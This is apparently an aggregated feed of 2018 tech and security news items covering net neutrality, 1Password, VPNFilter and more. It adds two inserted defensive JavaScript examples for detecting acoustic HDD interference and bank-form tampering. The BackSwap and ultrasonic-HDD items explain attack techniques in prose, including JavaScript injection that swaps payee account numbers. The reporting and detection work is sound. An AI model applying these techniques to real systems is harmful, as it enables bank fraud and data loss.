This Video Is All Your Kid Needs to Understand Climate Science

Lessons on climate change don’t require wonky charts or boring lectures. They can sometimes be as simple—and cute—as an animated video featuring penguins, an elephant seal, and some researchers ready for the freezing temperatures of Antarctica.

That’s the takeaway from this video released during the Hay Festival, which strives to present art and science ideas to help visitors imagine what the world could be in the future. That, of course, involves some explaining on climate change.

The Trans.MISSION series the festival put on in partnership with the Natural Environment Research Council. Message from Antarctica might be its cutest production yet.

The video, created by Emily Shuckburgh, an oceanographer at the British Antarctic Survey, and Chris Haughton, an award-winning author and illustrator, is tailored toward younger viewers. “We were trying to make it accessible as possible,” Haughton told Earther in an email.

The video shows the orange-suited scientists taking ice samples to learn about historic levels of carbon dioxide in the atmosphere. The science can be a little tricky to explain, but this video makes it easy to digest: Little bubbles in ice tell us how much carbon dioxide existed in the atmosphere in years past. The video goes on to explain how scientists have used this information to show that carbon emissions today are off the charts—and what that means for the world around us.

Artists can play a major role in conversations around climate change, collaborating with scientists in the past to create a hope-filled children’s book, this museum-worth visualization of rising temperatures, and much more. The rest of the videos in the Trans.MISSION series, which include lessons on clean air and weather, also use art to captivate audiences in a way that numbers and words sometimes can’t.

Watch the other videos here.


from Lifehacker https://ift.tt/2H56GGJ

California Senate votes to restore net neutrality rules

The California State Senate voted yesterday in favor of a bill aimed at restoring the net neutrality protections put in place by the Federal Communications Commission in 2015, and preventing ISPs from engaging in practices that are inconsistent with a free and fair Internet.

These protections were repealed by the FCC in December 2017 and are set to end on June 11, 2018.

About the bill

Senate Bill 822 is sponsored by Democratic Senator Scott Wiener and co-authored by a handful of other California State Democratic senators and assembly members.

It is supported by a broad coalition of public interest groups, labor organizations, social justice advocates, Internet service providers, start-ups and businesses, California mayors and local governments, as well as California residents. Among the supporters are also three former FCC commissioners, including Tom Wheeler, who was the Chairman of the FCC under President Obama.

The bill would, among other things, prevent ISPs from:

  • Blocking or slowing access to websites and discriminating against websites or applications.
  • Interfering with “a customer’s ability to select, access, and use broadband Internet access service or lawful Internet content, applications, services, or devices of the customer’s choice, or an edge provider’s ability to make lawful content, applications, services, or devices available to a customer.”
  • Zero-rating some Internet content, applications, services, or devices.
  • Engaging in deceptive or misleading marketing practices that misrepresent their treatment of Internet traffic, content, applications, services, or devices, or the performance characteristics or commercial terms of the broadband Internet access service to its customers.
  • Advertising or selling broadband Internet access service without prominently disclosing with specificity all aspects of the service.

It would also allow the California Attorney General to enforce and hold ISPs responsible for violations, and consumers to bring an action under the Consumer Legal Remedies Act to protect their right to an open Internet.

“When Donald Trump’s FCC took a wrecking ball to the Obama-era net neutrality protections, we said we would step in to make sure that California residents would be protected from having their internet access manipulated,” Senator Wiener noted.

“I want to thank the enormous grassroots coalition that is fighting tooth and nail to help pass SB 822 and protect a free and open internet. We have a lot more work to get this bill through the Assembly, but this is a major win in our fight to re-instate net neutrality in California.”

What now?

The State Assembly will begin hearing about the bill in June, and by the end of August they should vote on it. If the majority agrees with the bill, the final decision of whether it should become law rests with California Governor Jerry Brown (also a Democrat).

If the bill becomes law, it will likely get challenged in court, as the FCC included a provision in the 2017 repeal that blocks states from passing their own net neutrality rules. That is, if the repeal does not get repealed first by the US Congress and President Trump.


from Help Net Security https://ift.tt/2LaOAFM

1Password 7: A new design and added security features

AgileBits has released 1Password 7 for Mac and Windows. The password manager is among the most long-lived and popular offerings of its kind out there.

Both the Mac and Windows version sport a new design that puts the important things (i.e. the user’s items, the most important information) into focus and a new custom font that makes it easier to type passwords into another device.

The Mac version continues to support Touch ID and the Windows version Windows Hello for biometrics-based login. Both versions sport a new and even more helpful 1Password mini, and in the Mac version it’s not limited to working with browsers.

“With our new app integration we’ll automatically suggest logins for the current app you’re using. Along with support for drag and drop, this is a real game changer,” AgileBits founder Dave Teare noted. (Users can drag and drop items between vaults and accounts.)

The 1Password Watchtower is now a suite of security tools that notify users of breaches, highlight weak, vulnerable and reused passwords, point out logins that are using an insecure (HTTP) website address, and even warn users about soon-to-expire credit cards and documents.

“Watchtower integrates with Troy Hunt’s haveibeenpwned.com service to see if any of your logins are vulnerable. 1Password securely checks your items against a collection of breached passwords (over 500 million and counting) and notifies you to change them,” Teare explained.

Integration with twofactorauth.org allows Watchtower to know which websites support two factor authentication and to alert users when it finds logins without 2FA enabled.

“Also new in 1Password 7 (for Mac), we’ve taken advantage of Apple’s Secure Enclave to protect your Master Password when Touch ID is enabled. This is incredibly cool because the keys used for encryption are protected by the hardware and not accessible to other programs or the operating system,” Teare shared.

“And if you’re moving over to our new 1Password memberships, syncing your data is more secure than ever. With the addition of a Secret Key, Secure Remote Password, and Galois/Counter Mode, your data has never been safer.”

And for those worried about their passwords being accessible to the company, Michael Fey, Apple Team Lead for 1Password, says “Don’t.”

“The fact of the matter is that with 1Password your passwords are not ‘in the cloud’. What we store on our servers is a fully encrypted data blob that only you have the keys to decrypt,” he told Help Net Security.

“Furthermore, that decryption only ever happens on your devices – neither your master password nor any of the other pieces we use to encrypt your data are ever transmitted to us. Our security page covers all of this in detail, and if you really want to dive into it, our security white paper dives into the nitty gritty.”


from Help Net Security https://ift.tt/2LNsjyD

Finally Buy Yourself A Weighted Blanket For Just $86, While It Lasts

Amy Garden Weighted Blanket, 15 pounds | $86 | Amazon | After $11 off coupon

Weighted blankets can work wonders for your anxiety, and you can score an all-time low price on this 15 pound blanket from Amazon today. It’s just $86 after the $11 off coupon, making it the best weighted blanket deal we’ve ever posted. Not to stress you out, but we wouldn’t expect this deal to last for long.



from Lifehacker https://ift.tt/2Ji6rNq

How Men Can Learn to Have Healthier Conflict, With Divorce Attorney James Sexton

Our inaugural Livehacker event saw three expert speakers share their perspectives on the question “How should a man be?”

First up, divorce attorney James J. Sexton uses his experience with litigating couples (and as a father and ex-husband himself) to offer insights on what makes men behave badly—in marriage, in divorce, and in life—and how we can begin to heal these toxic behavioral patterns.


from Lifehacker https://ift.tt/2JgfPkR

Vulcan Cyber announces continuous vulnerability remediation platform and $4M seed round

Israeli startup Vulcan Cyber today announced $4 million in seed funding for its mission to eliminate the vulnerability remediation gap that unnecessarily exposes enterprises to massive cyber risk.

Vulcan Cyber co-founders, from left to right: CTO Roy Horev, CEO Yaniv Bar-Dayan and CPO Tal Morgenstern

Backing for the technology platform, which lets security teams gain the insight needed and take the action required to continuously eliminate exposed vulnerabilities in their production systems, comes from YL Ventures with participation from additional prominent cybersecurity investors.

The Vulcan Cyber Continuous Vulnerability Remediation platform eliminates the most critical risks caused by vulnerabilities while at the same time avoiding any unexpected impact to business operations. Vulcan reduces dwell time from weeks and months to hours.

Vulcan Cyber’s data collection aggregates data from dozens of scanning tools while its advanced exposure analytics deliver insight into the true risk of existing vulnerabilities in the deployed enterprise stack. Vulcan then automatically prioritizes, plans, orchestrates and validates remediation.

“Enterprises today are experiencing a state of continuous risk exposure,” said Yoav Leitersdorf, managing partner at YL Ventures, who led the Vulcan Cyber funding round. “This exposure is a board level concern. The speed of change and innovation and volume of constant probes and attacks has simply outpaced the tools and skilled resources IT security teams have. And for many teams, it simply feels like they’re in a never-ending storm of crisis and reactive activities.”

IT security and operations teams today rely on dozens of vulnerability assessment and patch management tools and are using manual processes and custom scripting to tie them together.

By automating the collection and integration of all the relevant vulnerability data from these tools across the enterprise IT stack, and correlating this information with risk exposure, Vulcan provides insight that enables continuous evaluation of exposure and prioritization of remediation. Vulcan then orchestrates patch management, IT service management tools and the teams and tasks needed to continuously remediate the most critical exposure in production environments. Lastly, Vulcan validates remediation effectiveness and feeds the new data back into the insight engine. Vulcan integrates out of the box with all popular scanning, configuration management and patching tools as well as provides open APIs to connect new scanners, tools and feeds into the platform.

“The team at Vulcan has the right vision to deliver IT security teams unprecedented insight and the ability and confidence needed to successfully eliminate exposure and risk. Vulcan has the potential to be transformative for enterprises, taking them from a state of continuous exposure to continuous protection,” Leitersdorf added.

Andy Ellis, CSO of Akamai, concurred, “Organizations today have diverse ecosystems, from on-premise bespoke applications to cloud-deployed services. Keeping track of the state of these applications and systems — often owned by distinct engineering and operations teams — in order to ensure that system maintenance keeps up with the never-ending flow of vulnerabilities and exposures is vital. Continuous and integrated visibility into remediation is the first step to remediation orchestration for enterprises.”

“Vulcan’s approach to enable and empower both IT security teams and their operations counterparts is a leap forward, giving us a vision for a world where companies aren’t being breached every day with exploits against vulnerabilities that have been known about for months or years”, said Ellis.

Yaniv Bar-Dayan, Vulcan Cyber CEO and co-founder explains that vulnerabilities are the “dirty” but critical work of IT security. “It has become almost impossible for CISOs and their teams to understand and manage the significant and systemic risk of vulnerabilities in their production systems, leaving them in a state of continuous exposure. It might sound more glamorous to talk about zero day and next generation threats, but vulnerability remediation is truly where the rubber meets the road. The only way to deal with this continuous risk exposure is through continuous remediation, achieved with robust data collection, advanced analytics, automation, and closed loop remediation planning, orchestration and validation. This is exactly what we are delivering to IT security teams with Vulcan Cyber.”

The Vulcan Platform is currently in limited availability to qualified customers. General availability will be in late 2018. More information about the launch is available in the video below:


from Help Net Security https://ift.tt/2H4mI3o

Attacking hard disk drives using ultrasonic sounds

Another group of researchers has demonstrated that hard disk drives (HDDs) can be interfered with through sound waves, and has also shown that ultrasonic signals (i.e., sounds inaudible to the human ear) can be used to damage their integrity and availability.

Attacking HDDs

HDDs are non-volatile data storage devices that store and retrieve digital information by using rapidly rotating disks coated with magnetic material and magnetic heads that read and write data to the disks’ surfaces. They are usually found in personal computers, cloud servers, consumer electronics, CCTV systems, medical monitors, ATMs, and so on.

Late last year, a group of researchers from Princeton and Purdue University demonstrated a new denial-of-service (DoS) attack against HDDs, which exploited a physical phenomenon known as acoustic resonance.

They showed that vibrations caused by specially crafted acoustic signals can cause significant vibrations in HDDs’ internal components and therefore negatively influence the performance of HDDs embedded in real-world systems.

As effective as such attacks could be, they are unlikely to go unnoticed. But, according to a recently released paper by researchers from the University of Michigan and Zhejiang University, even ultrasonic signals (above 20 kHz) can bring about physical errors in hard disk drives and therefore lead to system-level errors.

Ultrasonic attacks

“A HDD read/write head floats (∼10 nm) above the surface of each spinning disk. Data is organized in tracks that circle the disk. To read or write data, the head stack assembly must position the head above the desired track. There is a narrow margin of error (on the scale of nm) within which the read/write head can operate,” the researchers explained.

“Ultrasonic waves can alter the HDD shock sensor’s output, causing a drive to unnecessarily park its head. Audible tones can vibrate the read/write head(s) and disk outside of operational bounds. Both of these different methods result in improper function of the drive.”

These attacks can be executed via nearby sound emitters and, occasionally, even through the target system’s own built-in speakers (it all depends on their frequency response).

“Ultrasonic attacks are less likely to cause a head crash, but could be damaging the drive in other ways such as causing the head to become unstable over time because of excessive parking. This instability could make the drive less reliable in its reads and writes, leading to sectors being marked as bad,” the researchers noted.

They propose a number of defenses that can be used to detect or prevent these attacks, including a feedback controller that could be easily deployed as a firmware update to attenuate the intentional acoustic interference.
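A defender-side heuristic for the symptom described above, added here as an example and not taken from the paper or its authors: each unnecessary head park caused by a spoofed shock-sensor reading shows up as an increment of the drive's SMART Load_Cycle_Count attribute, so comparing two `smartctl -A` snapshots and flagging a parking rate far above the drive's own baseline (plus any growth in reallocated or pending sectors) gives an early warning. The snapshots, the baseline and the multiplier are constructed values.

```javascript
// Parse the attribute table printed by `smartctl -A` into { name: rawValue }.
// Row layout: ID# NAME FLAG VALUE WORST THRESH TYPE UPDATED WHEN_FAILED RAW_VALUE
function parseSmartAttributes(text) {
  const attrs = {};
  for (const line of text.split("\n")) {
    const f = line.trim().split(/\s+/);
    if (f.length < 10 || !/^\d+$/.test(f[0])) continue; // skip header / blank lines
    attrs[f[1]] = parseInt(f[9], 10); // first numeric token of RAW_VALUE
  }
  return attrs;
}

// Compare two snapshots taken `hoursBetween` hours apart. A drive that parks
// its head `factor` times more often than its baseline, or that starts
// reallocating sectors, matches the failure mode the paper describes.
// baselineParksPerHour must be measured per drive: laptop drives with
// aggressive power management park far more often than server drives.
function assessAcousticInterference(before, after, hoursBetween, opts = {}) {
  const { baselineParksPerHour = 2, factor = 10 } = opts; // constructed defaults
  const a = parseSmartAttributes(before);
  const b = parseSmartAttributes(after);
  const parks = (b.Load_Cycle_Count || 0) - (a.Load_Cycle_Count || 0);
  const rate = parks / hoursBetween;
  const findings = [];
  if (rate > baselineParksPerHour * factor) {
    findings.push(`head parked ${parks} times in ${hoursBetween}h ` +
      `(${rate.toFixed(1)}/h against a baseline of ${baselineParksPerHour}/h)`);
  }
  for (const name of ["Reallocated_Sector_Ct", "Current_Pending_Sector"]) {
    const delta = (b[name] || 0) - (a[name] || 0);
    if (delta > 0) findings.push(`${name} grew by ${delta}`);
  }
  return { parksPerHour: rate, suspicious: findings.length > 0, findings };
}

// Constructed snapshots in the layout of `smartctl -A`, one hour apart.
const SNAPSHOT_BEFORE = `ID# ATTRIBUTE_NAME          FLAG     VALUE WORST THRESH TYPE      UPDATED  WHEN_FAILED RAW_VALUE
  5 Reallocated_Sector_Ct   0x0033   100   100   010    Pre-fail  Always       -       0
193 Load_Cycle_Count        0x0032   099   099   000    Old_age   Always       -       1200
197 Current_Pending_Sector  0x0012   100   100   000    Old_age   Always       -       0`;

const SNAPSHOT_AFTER = `ID# ATTRIBUTE_NAME          FLAG     VALUE WORST THRESH TYPE      UPDATED  WHEN_FAILED RAW_VALUE
  5 Reallocated_Sector_Ct   0x0033   100   100   010    Pre-fail  Always       -       3
193 Load_Cycle_Count        0x0032   098   098   000    Old_age   Always       -       1600
197 Current_Pending_Sector  0x0012   100   100   000    Old_age   Always       -       2`;

if (typeof require !== "undefined" && require.main === module) {
  console.log(assessAcousticInterference(SNAPSHOT_BEFORE, SNAPSHOT_AFTER, 1));
}
```

A spike in Load_Cycle_Count alone is also what a failing power-management setting looks like, so treat the alert as a prompt to check the drive's physical surroundings and sensor logs rather than as proof of an attack.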


from Help Net Security https://ift.tt/2J1dyqm

Cryptomining apps are on the rise, malicious apps in app stores decline

RiskIQ analyzed 120 mobile app stores and more than two billion daily scanned resources. The findings showed that taking advantage of the popularity and volatility of the cryptocurrency landscape is paying off for threat actors via the mobile attack vector and that malicious apps leveraged by nation-state actors are becoming more prominent.

In Q1 RiskIQ issued an alert, warning of blacklisted apps masquerading as, or associating themselves with Bitcoin exchanges, Bitcoin wallets, or just cryptocurrency in general. These are indicative of the rise of digital currencies and their attractiveness as an income stream for both crooks and legitimate businesses.

The RiskIQ Q1 Mobile Threat Landscape Report also showed that malicious mobile apps continued to decline, even though the total number of apps observed by the company has risen by hundreds of thousands over the last four quarters. In Q1, 21,948, or 1.4%, of the 1,508,825 newly observed apps were blacklisted, a lower percentage than in the previous four quarters.

The number of blacklisted feral apps declined for the fourth straight quarter, from 3,507 in Q4 2017 to 1,981 in Q1 2018, but they still represent a significant portion of all blacklisted apps; forty-six percent of feral apps were blacklisted in Q1 2018.

Meanwhile, Google hosted 8,287 blacklisted apps in Q1, which is consistent with previous quarters and outpaces the next most blacklisted store, AndroidAPKDescargar, by 4,595. Although the Play Store consistently had high numbers of blacklisted apps between Q3 2017 and Q1 2018, its rate of blacklisted apps has hovered around a relatively modest five percent.

The report found that many blacklisted apps shared several of the same permissions. Eighty-six percent of apps blacklisted in Q1 claimed the READ_SMS permission, which allows the app to read messages and can be used for any number of nefarious purposes, including circumventing two-factor authentication.

Most of the apps that can read messages can also track location, read and write to the call log, generate alert windows, change settings, and make other dubious requests. Among apps blacklisted in the Google Play Store, 1,207 access the phone’s camera, nearly 800 of which also record location data and about 600 record audio.


from Help Net Security https://ift.tt/2sq1ub0

DHS, FBI warn about malware tied to North Korean threat actor

US-CERT has released a new technical alert on malware used by Hidden Cobra, a threat actor whose activities they believe to be directed by the North Korean government.

The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) have been documenting malware used by the group for a while now.

This time, they warn about Joanap, a remote access tool (RAT) that is used “to establish peer-to-peer communications and to manage botnets designed to enable other operations”, and Brambul, a brute-force authentication worm that spreads through SMB shares.

“According to reporting of trusted third parties, Hidden Cobra actors have likely been using both Joanap and Brambul malware since at least 2009 to target multiple victims globally and in the United States—including the media, aerospace, financial, and critical infrastructure sectors,” the alert notes.

“Like many of the families of malware used by Hidden Cobra actors, Joanap, Brambul, and other previously reported custom malware tools, may be found on compromised network nodes.”

According to the organization, compromised network nodes identified as part of the Joanap infrastructure are scattered all across the world.

“FBI has high confidence that HIDDEN COBRA actors are using the IP addresses—listed in this report’s IOC files—to maintain a presence on victims’ networks and enable network exploitation. DHS and FBI are distributing these IP addresses and other IOCs to enable network defense and reduce exposure to any North Korean government malicious cyber activity,” it said.

US-CERT advises administrators to make use of the provided indicators of compromise and a malware analysis report to check whether their networks have been compromised, as well as provided general advice on strategies that can mitigate the threat these and other malware can pose to them.

The alert did not name specific targets, but it did contain a link to a separate report by analytics company Novetta, which says the same group was behind the 2014 Sony Pictures Entertainment hack.


from Help Net Security https://ift.tt/2kBBzty

Network Critical launches SmartNA-PortPlus, a Packet Broker for ultimate scalability

Network Critical announced SmartNA-PortPlus. This latest Packet Broker is a high density, high performance solution with up to 192 Ports covering 1/10/25/40/100G speeds. It enables organizations to tap into next-generation high speed networks whilst leveraging existing monitoring tool investments, thereby reducing capital expenditure.

Available in September 2018, this network visibility product creates the foundation for understanding what is happening on the network, especially when dealing with a myriad of tools, allowing organizations to better manage and improve the performance of their network.

SmartNA-PortPlus enables 100% visibility of network traffic. This means that huge volumes of network traffic can be aggregated, filtered and load balanced across multiple security and monitoring tools.

The sheer volume of data that organisations are trying to push through the network has swiftly increased in the last few years, as has demand for faster network speeds. That’s because organizations have witnessed a rapid evolution of business applications and systems as well as a shift toward more virtual and cloud computing at a time of ever-increasing threats to the network.

As a result, the network perimeter is fast disappearing as users become more mobile and organisations do more business in the cloud. Additionally, stringent government and industry regulations require stricter data center controls to ensure compliance.

In this environment the need to observe all traffic, prevent malicious activity and ensure a high performance network is critical. SmartNA-PortPlus helps to ‘bridge the gap’ in organisations who have differing network traffic speeds and whose security and monitoring tools have differing capabilities to receive traffic. Because the product can effectively handle traffic at 1/10G and 25G as well as 40G and 100G, and features an enormous 1.8 Tbps system throughput, it can act as the central hub to gather vast quantities of data and distribute it to the right tools.

“We enable organizations to send the right traffic to the right tools and to do this quickly and robustly. With our SmartNA-PortPlus we have extended the diversity of ports at a lower cost to provide ultimate scalability for our clients. This increase in ports means that the SmartNA-PortPlus™ product will disrupt the market because it delivers scalability, flexibility and affordability, enabling companies to future proof their network and scale at a pace and size that suits their needs,” said Alastair Hartrup, Global CEO of Network Critical.

Other key features include Network Critical’s patented Drag-n-Vu technology, which allows organizations to filter traffic based on IP addresses, protocols, ports and VLANs to provide improved network visibility. Drag-n-Vu also makes it easy to add complex filter rules and port mapping, virtually eliminating configuration time as well as costly mistakes.

“What’s really disruptive about the SmartNA-PortPlus is that we are now making 100G capabilities more broadly available to a much wider market. Previously this technology was only really suitable for those with sizable networks and deep pockets,” concluded Hartrup.


from Help Net Security https://ift.tt/2kzG8EM

BackSwap Trojan exploits standard browser features to empty bank accounts

Creating effective and stealthy banking malware is becoming increasingly difficult, forcing malware authors to come up with innovative methods. The latest creative burst in this malware segment comes from a group that initially came up with malware stealing cryptocurrency by replacing wallet addresses in the clipboard.

About the BackSwap banking malware

“To steal money from a victim’s account via the internet banking interface, typical banking malware will inject itself or its specialized banking module into the browser’s process address space,” ESET malware researcher Michal Poslušný notes.

The success of this approach depends on the injection not being detected by security solutions, on the modules matching the bitness of the target browser, and on the banking module hooking browser functions whose location varies from browser to browser.

BackSwap eschews the usual “process injection for monitoring browsing activity” trick. Instead, it handles everything by working with Windows GUI elements and simulating user input.

“This might seem trivial, but it actually is a very powerful technique that solves many ‘issues’ associated with conventional browser injection,” the researcher notes.

“First of all, the malware does not interact with the browser on the process level at all, which means that it does not require any special privileges and bypasses any third-party hardening of the browser, which usually focuses on conventional injection methods. Another advantage for the attackers is that the code does not depend either on the architecture of the browser or on its version, and one code path works for all.”

BackSwap monitors the visited URLs, looks for and detects bank-specific URLs and window titles by hooking key window message loop events.

Once banking activity is detected, the malware injects malicious JavaScript into the web page, either via the browser’s JavaScript console or directly into the address bar (via JavaScript protocol URLs, a little-used feature supported by most browsers). Also interesting is that the malware cleverly bypasses several countermeasures browser makers have implemented to prevent the exploitation of that last feature.

Finally, the injected JavaScript replaces the recipient’s bank account number with the number of an account opened by the attackers or their mules. If the user doesn’t notice the switch and authorizes the transaction, the attack is successful.

BackSwap distribution

At the moment, the malware is made to target customers of five Polish banks (PKO Bank Polski, Bank Zachodni WBK S.A., mBank, ING and Pekao), and will only steal money if the wire transfer amount is between 10,000 and 20,000 Polish zloty (i.e., $2,800 – $5,600).

Targets get infected by opening malicious attachments to spam email, which contain the Nemucod or other downloader Trojans.

“The payload is delivered as a modified version of a legitimate application that is partially overwritten by the malicious payload. The application used as the target for the modification is being changed regularly – examples of apps misused in the past include TPVCGateway, SQLMon, DbgView, WinRAR Uninstaller, 7Zip, OllyDbg, FileZilla Server,” the researcher shared.

The app is modified to jump to the malicious code during its initialization and control is transferred to the malware (the legitimate app will not work).

According to Poslušný, the intent of this approach is not to fool users into thinking they are running the legitimate app, but to minimize the possibility of the malware being detected and analyzed.

“This makes the malware harder for an analyst to spot, as many reverse engineering tools like IDA Pro will show the original main() function as a legitimate start of the application code and an analyst might not notice anything suspicious at first glance,” he explained.
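One mitigation a bank's web front end can apply against the final step described above (injected script rewriting the recipient account number), added here as an example and not code from ESET's analysis or from BackSwap: assigning `input.value` from script fires no trusted `input` event, so the page can keep its own record of what the user actually typed and refuse to submit when the field's final value differs. The field id `recipient-account` and the normalisation rule are assumptions.

```javascript
// Account numbers are typed with or without spaces; compare on the characters
// only so cosmetic reformatting by the page itself is not reported as tampering.
function normaliseAccount(value) {
  return String(value).replace(/\s+/g, "").toUpperCase();
}

class RecipientFieldGuard {
  constructor() {
    this.lastUserValue = "";  // field value as last produced by a trusted user event
    this.untrustedEvents = 0; // 'input' events dispatched from script (isTrusted === false)
  }
  // Call from the field's 'input' handler with the current value and ev.isTrusted.
  // Script-dispatched events are counted but never update the trusted record.
  recordInput(value, isTrusted) {
    if (isTrusted) this.lastUserValue = normaliseAccount(value);
    else this.untrustedEvents += 1;
  }
  // Verdict for the value the form is about to submit.
  check(submittedValue) {
    const submitted = normaliseAccount(submittedValue);
    if (submitted === this.lastUserValue) {
      return { ok: true, reason: "recipient matches user input" };
    }
    const synthetic = this.untrustedEvents
      ? ` (${this.untrustedEvents} synthetic input events seen)` : "";
    return {
      ok: false,
      reason: `recipient "${submitted}" differs from the last user-typed value ` +
        `"${this.lastUserValue}"${synthetic}`,
    };
  }
}

// Offline simulation of one transfer: the user types `typed` character by
// character, then (optionally) injected script overwrites the field value,
// mimicking `input.value = ...` from a javascript: URL or console injection.
function simulateTransfer(typed, scriptRewrite = null) {
  const guard = new RecipientFieldGuard();
  let field = "";
  for (const ch of typed) {
    field += ch;
    guard.recordInput(field, true); // a real keystroke yields a trusted event
  }
  if (scriptRewrite !== null) field = scriptRewrite;
  return guard.check(field);
}

// Browser wiring; skipped when run outside a page (e.g. under node).
if (typeof document !== "undefined") {
  const field = document.getElementById("recipient-account"); // assumed id
  if (field && field.form) {
    const guard = new RecipientFieldGuard();
    field.addEventListener("input", (ev) => guard.recordInput(field.value, ev.isTrusted));
    field.form.addEventListener("submit", (ev) => {
      const verdict = guard.check(field.value);
      if (!verdict.ok) {
        ev.preventDefault();
        console.warn("transfer blocked:", verdict.reason); // report to the backend in practice
      }
    });
  }
}
```

Because this check runs inside the same browser the malware controls, injected script can also disable it, so the dependable control remains showing the recipient number in the out-of-band confirmation the user authorizes. Malware that retypes the number through simulated keyboard input produces trusted events and is not caught by this check.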


from Help Net Security https://ift.tt/2L3j649

Tuesday review – the hot 22 stories of the week

From the ticking time bomb lurking on your router and Chrome dropping 'secure' label to the forgotten site that attracted hacks and fines, and more!
from Naked Security https://ift.tt/2GYsJil

Facebook now supports 2FA via authenticator apps

Facebook has good news for users who wish to secure their accounts with two-factor authentication but aren’t comfortable sharing their phone number with the social network: there’s now an option to use authenticator apps to receive the second authentication factor.

The move was announced on Wednesday by Facebook’s product manager Scott Dickens.

“We previously required a phone number in order to set up two-factor authentication, to help prevent account lock-outs. Now that we have redesigned the feature to make the process easier to use third-party authentication apps like Google Authenticator and Duo Security on both desktop and mobile, we are no longer making the phone number mandatory,” he said.

The National Institute of Standards and Technology (NIST) is advising against using SMS-based two-factor authentication as the method is vulnerable to attack.

An attacker can convince the mobile operator to redirect the victim’s mobile phone to the attacker and receive the code via SMS. Or, a malicious app on the endpoint can harvest information sent via SMS.

Dickens did not mention how many users already enabled 2FA via SMS.

How to set up Facebook 2FA via Authentication App

The process of enabling two-factor authentication has also been streamlined.

Users are required to go to Settings > Security and Login, press the Edit button next to the Use two-factor authentication option, and follow the instructions provided once they press the Get Started button.

Users should choose the 2FA via Authentication App option, which they can set up by simply scanning the offered QR code (see image above), and then confirm the setup by entering the confirmation code provided by the app. They are also given the option of allowing logins without a code for one week.

Once 2FA is set up, Facebook will ask for the login code any time users log in on a phone or computer the service does not recognize.


from Help Net Security https://ift.tt/2IUU1fa

Week in review: VPNFilter, hacking BMW cars, verifying data processing for privacy and GDPR


Here’s an overview of some of last week’s most interesting news and articles:

The percentage of open source code in proprietary apps is rising
The number of open source components in the codebase of proprietary applications keeps rising and with it the risk of those apps being compromised by attackers leveraging vulnerabilities in them, a recent report has shown.

VPNFilter malware compromises over 500,000 networking devices around the world
Cisco Talos researchers have flagged a huge botnet of small and home office routers and NAS devices, capable of collecting communications and data and launching cyber attacks.

GDPR: Today is the day
As GDPR becomes enforceable, we sat down with Jerry Caponera, VP Cyber Risk Strategy, Nehemiah Security, to talk about this important regulation and its wide-ranging impact.

Microsoft will extend GDPR rights to customers worldwide
Known as Data Subject Rights, they include the right to know what data we collect about you, to correct that data, to delete it and even to take it somewhere else.

Security spring cleaning: Tidying up messy firewall rules to reduce complexity
Most security teams are waging a daily battle against complex IT infrastructures, advanced malware and a severe skills shortage – a trifecta that has forced them to tackle select “priorities,” while letting other important initiatives fall by the wayside. One such task that usually falls to the bottom of the security “to-do” list is firewall rule cleanup.

Verifying data processing for privacy and GDPR
GDPR is having its moment in the public discourse. However, those who work to protect identity data have been fretting about the critical components of the regulation for some time. Specifically, the “Article 30 Record-Keeping Requirement” aims to provide evidentiary proof of how a company processes personal data. The challenge for organizations in documenting their data processing activities is how to do that in a data-driven way.

Researchers hack BMW cars, discover 14 vulnerabilities
Keen Security Lab researchers have discovered fourteen vulnerabilities affecting a variety of BMW car models. The flaws could be exploited to gain local and remote access to the infotainment system (a.k.a. head unit), the Telematics Control Unit (TCU or TCB) and UDS communication, as well as to gain control of the vehicles’ CAN bus.

How a URL shortener allows malicious actors to hijack visitors’ CPU power
URL shorteners are often used by malware peddlers and attackers to trick users into following a link they otherwise wouldn’t. But Coinhive’s URL shortener carries an added danger: your CPU power can be surreptitiously hijacked to mine Monero.

Fortnite is coming to Android, but malicious fake apps are already there
Android users eager to play the increasingly popular Fortnite survival game on their mobile devices are being targeted left and right with malicious apps masquerading as the game or apps related to it.

European users can request a copy of the data Apple keeps on them
Apple has set up a Data and Privacy portal where users can make a request to download all the data Apple has on them, correct their personal information, deactivate or delete their account.

Fraud data shows 680% spike in fraudulent mobile app transactions
The number of fraudulent transactions originating from a mobile app during the first quarter has increased by 200 per cent since 2015, according to RSA Security. Analysis from the team also indicated that abuse of social media platforms is a growing problem, with social media replacing the dark web as the top hacker marketplace.

Fighting ransomware with network segmentation as a path to resiliency
Recent cybersecurity events involving the use of ransomware (WannaCry and similar variants) represent the latest examples highlighting the need for organizations to not only take an initial hit, but survive, adapt, and endure. In other words, be resilient.

Whitepaper: Future-proofing your password policy
This whitepaper weighs conventional best practices against the new Digital Identity Guidelines from NIST.

Crypto Me0wing attacks: Kitty cashes in on Monero
It’s been a month since the first Drupalgeddon 2.0 RCE (SA-CORE-2018-002/CVE-2018-7600) exploit was first published, unleashing its destruction into the wild… and through our cloud monitoring systems. As expected, since then we’ve been picking up various attack variants piggybacking on the Drupalgeddon 2.0 exploit, including remote scanners and backdoor attempts. In accordance with the latest dark web app hype, it wasn’t long until we started picking up cryptojacking exploit attempts directed at remote servers as well.

New Spectre-like flaw found in CPUs using speculative execution
CVE-2018-3639, discovered independently by Google Project Zero and Microsoft Security Response Center researchers and dubbed “Variant 4,” is a Speculative Store Bypass (SSB) vulnerability and is considered a new variant of the previously revealed Spectre Variant 1 vulnerability.

America’s most cyber insecure cities exposed
Coronet researchers identified Las Vegas, Memphis and Charlotte as America’s most cyber insecure cities.

The ethical and legal dilemmas of threat researchers
Threat intelligence is mainstreaming into a de-facto everyday tool of cyber-defense. But all that intelligence must be collected, analyzed, and prepared by someone. Enter threat researchers, the advanced scouts of cybersecurity.

PCI Security Standards Council publishes PCI DSS 3.2.1
PCI DSS version 3.2.1 replaces version 3.2 to account for effective dates and SSL/early TLS migration deadlines that have passed.

New infosec products of the week: May 25, 2018
A rundown of infosec products released last week.


from Help Net Security https://ift.tt/2J7x9sa

FBI issues VPNFilter malware warning, says “REBOOT NOW” [PODCAST]

The FBI just issued a VPNFilter malware warning saying, "Reboot your routers now!" But why? And will it help?
from Naked Security https://ift.tt/2INJxy2

Skip 'Hey Guys!' YouTube Video Intros With These Two Handy Hotkeys

You’ve subscribed to their YouTube channel, you’ve smashed that like button countless times, and maybe you’ve even donated some cash to their Patreon. Still, you have to listen to the same exact video intro all YouTubers use for some reason every single time. Behold, two hotkeys that will save you from having to hear “Hey, what’s up guys?” ever again.

Which hotkeys you use will depend on how long a YouTube channel’s intros usually are. You probably have an idea if you’ve watched a few videos on their channel.

If intros are usually long...

